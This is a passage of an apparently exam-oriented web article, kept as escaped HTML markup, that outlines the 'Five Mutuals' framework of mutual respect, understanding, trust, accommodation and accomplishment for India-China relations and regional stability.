How can these principles address the current challenges in their bilateral ties and contribute to regional stability?<\/strong> <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">India-China relations have become one of the most important bilateral relations and the formulation of \u2018five mutuals\u2019 can help bring China-India relations back to a stable and sound track.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>About the \u201cFive Mutuals\u201d Framework<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The \u201cFive Mutuals\u201d is an extension of the Five Principles of Peaceful Coexistence that aligns with India\u2019s principles of \u201cmutual respect, mutual sensitivity, and mutual interests\u201d.<\/li>\n\n\n\n<li>The \u201cFive Mutuals\u201d provide a significant path for us to implement the above consensus.<\/li>\n\n\n\n<li>They should also be the guiding principles for the two big neighbours to get along well.\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Principles address the current challenges in their bilateral ties and contribute to regional stability<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>1) Mutual Respect<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It is the prerequisite for the development of China-India relations.<\/li>\n\n\n\n<li>Two ancient civilisations, both China and India have <strong>their own uniqueness in terms of dietary habits, lifestyles, cultural traditions and development paths.&nbsp;<\/strong><\/li>\n\n\n\n<li>In the new era, it is of even greater significance to view each other with an open mind, respect each other\u2019s development path, social system and role on the world stage<\/li>\n\n\n\n<li>Jointly <strong>promote development<\/strong> and prosperity of the <strong>two countries, the region and the world.<\/strong><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>2) Mutual understanding&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It is the basis of the development of China-India relations.&nbsp;<\/li>\n\n\n\n<li>Both nations empathized with each other\u2019s struggles for <strong>independence and support each other\u2019s aspirations for national rejuvenation and strategic autonomy.<\/strong><\/li>\n\n\n\n<li>China understands<strong> India\u2019s aspiration for national rejuvenation, and supports India\u2019s foreign policy of strategic autonomy<\/strong><\/li>\n\n\n\n<li>Need to further promote dialogue and communication at all levels in various fields, encourage the two peoples t<strong>o have more exchanges, and promote mutual understanding and political trust<\/strong><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>3) Mutual trust&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It is the key to the development of China-India relations.&nbsp;<\/li>\n\n\n\n<li>Need to view bilateral relations from a strategic perspective, form the <strong>right perception of each other, view each other\u2019s strategic intentions objectively, and stick to the right vision<\/strong> \u2014 that China and India are partners and development opportunities to each other instead of being rivals or threats.<\/li>\n\n\n\n<li>Could work together fo<strong>r peaceful coexistence and insist on resolving disputes in a peaceful manner.&nbsp;<\/strong><\/li>\n\n\n\n<li>The Chinese people are willing to be good friends and partners of the<strong> Indian people forever, living in harmony and pursuing common development.<\/strong><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>4) Mutual accommodation&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It is the guarantee of the <strong>development of India-China relations. <\/strong>China and India are neighbours who cannot be moved away.\u00a0<\/li>\n\n\n\n<li>It is believed that they <strong>can find effective ways to mutually accommodate each other\u2019s core interests and major concerns<\/strong>, properly handle differences through dialogue, and reach a mutually acceptable solution.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>5) Mutual accomplishment&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It is the direction of the development of China-India relations.<\/li>\n\n\n\n<li>China and India are both at a <strong>critical stage of national development and revitalisation<\/strong>, and enjoy <strong>broad common interests and the space for cooperation.<\/strong><\/li>\n\n\n\n<li>China is advancing <strong>Chinese modernisation on all fronts<\/strong>, which will provide new opportunities to the world.
